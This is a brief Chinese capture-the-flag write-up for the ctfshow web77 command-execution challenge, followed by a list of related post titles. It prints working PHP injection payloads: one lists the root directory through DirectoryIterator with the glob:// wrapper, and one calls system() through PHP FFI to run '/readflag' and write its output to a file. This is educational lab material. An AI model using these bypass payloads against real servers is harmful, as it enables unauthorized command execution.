目录

  • 源码
  • 思路
  • 题解
  • 总结

源码


Warning: error_reporting() has been disabled for security reasons in /var/www/html/index.php on line 14Warning: ini_set() has been disabled for security reasons in /var/www/html/index.php on line 15Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 24
你要上天吗?

思路

这题发现mysql load_flie用不了了

题解

用glob协议读取根目录

c=?><?php $a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');} exit(0);?>

用ffi读取flag发现无法正常回显,注意到目录有个readflag,访问1.txt拿到flag

$ffi = FFI::cdef("int system(const char *command);");
$a='/readflag > 1.txt';
$ffi->system($a);
exit(0)

总结

想学FFI还得懂C

CTFshow 命令执行 web77相关推荐

  1. CTFshow——命令执行

    CTFshow--命令执行 Web29 <?php error_reporting(0); if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_matc ...

  2. [CTFSHOW]命令执行

    文章目录 web 29 web 30 web 31 web32 web33-36 web37 web38 web40 web41 web42 web43 web44 web45 web46 web47 ...

  3. CTFshow命令执行29-123

    命令执行 WEB29 eval是php中执行以PHP脚本执行的命令 PHP命令可以执行脚本命令 本题使用方法是先 system(cp f*.php 1.txt) 然后访问1.txt WEB30 在PH ...

  4. CTFshow 命令执行 web72

    目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 ...

  5. ctfshow 命令执行 web29-web77 web118-122 web124 wp

    南神博客 文章目录 命令执行 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 w ...

  6. ctfshow命令执行篇

    web31 echo(`ls%09/`); echo(`tac%09fla*`); web32 过滤; 关键命令执行函数也不能用 用文件包含 其实这个做法也是靠刷题经验猜flag路径 c=includ ...

  7. [CTFSHOW]命令执行55-74

    web 55 if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\< ...

  8. ctfshow命令执行(持续更新,已更至web39)

    做命令执行题比前两种慢很多,到现在也只做了总数的五分之一,慢慢来吧. web29 web30 web31 web32 web33~36 web37 web38 web39 web29 题目如下: er ...

  9. CTFshow 命令执行 web56

    目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 ...

最新文章

  1. adoquery查询结果如何赋给一个变量(delphi和c++ builder)
  2. 字符与字符串3——char 的大小
  3. [react] react中的setState和replaceState的区别是什么?
  4. react笔记组件属性传递机制(四)
  5. extjs chart无法在panel中显示_HighChart教程:Swift中的Highcharts iOS库
  6. 添加Silverlight应用到HTML
  7. Win能ping通win7,但是无法访问共享的解决方法
  8. 技术改变世界以及减速慢行
  9. nodejs连接postgresql_PostgreSQL 使用 node-postgres 在 node.js 中的应用
  10. 软件测试中测试文档的编写:测试流程测试用例
  11. 虚拟机桥接模式ping不通外网的解决办法
  12. 巴法云 mixly 扩展库
  13. python中 {0:2.2f}与{1:2.2f}的区别
  14. 如何用老毛挑清除WINDOWS密码(以HP笔记本为例)
  15. 帝国时代3手机单机版java_帝国时代3手游单机版
  16. Python中如何保留n位有效数字
  17. 个人收藏的Java网站【偷偷收藏】
  18. SQL SERVER中的游标
  19. turbolinux mysql 5.0 cluste_--mysql 5.0 集群负载均衡—经过测试
  20. 神经网络中的S型函数是什么?

热门文章

  1. shell无上传cmd等exe文件权限解决办法
  2. MiaSocks发布第一个测试版
  3. 如何查看计算机里家庭组有几个,win7网络文件夹-win7家庭组共享的文件在哪儿查?win7 – 手机爱问...
  4. python 测试用例中设置执行时间_Python基于unittest实现测试用例执行
  5. 第 3 章 Keystone - 018 - 理解 Keystone 核心概念
  6. Vue实例里this的使用
  7. win server 2008 R2 安装IIS
  8. 码教授告诉你面试不要骄傲自负,也不妄自菲薄
  9. SVG(网页加载显示的加载进度动态图)
  10. Paging of Large Resultsets in ASP.NET中介绍的SET ROWCOUNT方式存储过程的问题